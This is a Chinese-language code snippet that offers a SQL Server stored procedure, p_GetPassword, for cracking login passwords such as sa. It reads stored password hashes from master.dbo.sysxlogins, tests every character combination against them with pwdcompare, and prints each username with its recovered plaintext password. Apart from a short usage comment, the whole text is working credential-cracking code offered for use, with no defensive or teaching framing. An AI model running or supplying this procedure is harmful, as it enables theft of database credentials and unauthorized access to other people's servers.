一个SQL Server Sa密码破解的存储过程:
SQL代码
- if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
- drop procedure [dbo].[p_GetPassword]
- GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码
条件是你的电脑配置足够,时间足够
/*--调用示例
SQL代码
- exec p_GetPassword
- --*/
- create proc p_GetPassword
- @username sysname=null, --用户名,如果不指定,则列出所有用户
- @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的
- as
- set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end
- select top 255 id=identity(int,0,1) into #t from syscolumns
- alter table #t add constraint PK_#t primary key(id)
- select name,password
- ,type=case when xstatus&2048=2048 then 1 else 0 end
- ,jm=case when password is null then 1 else 0 end
- ,pwdstr=cast('' as sysname)
- ,pwd=cast('' as varchar(8000))
- into #pwd
- from master.dbo.sysxlogins a
- where srvid is null
- and name=isnull(@username,name)
- declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
- declare @l int
- select @l=0
- ,@s1='char(aa.id)'
- ,@s2='cast(aa.id as varchar)'
- ,@s3=',#t aa'
- exec('
- update pwd set jm=1,pwdstr='+@s1+'
- ,pwd='+@s2+'
- from #pwd pwd'+@s3+'
- where pwd.jm=0
- and pwdcompare('+@s1+',pwd.password,pwd.type)=1
- ')
- while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
- begin
- select @l=@l+1
- ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
- ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
- ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
- exec('
- update pwd set jm=1,pwdstr='+@s1+'
- ,pwd='+@s2+'
- from #pwd pwd'+@s3+'
- where pwd.jm=0
- and pwdcompare('+@s1+',pwd.password,pwd.type)=1
- ')
- end
- select 用户名=name,密码=pwdstr,密码ASCII=pwd
- from #pwd
- go
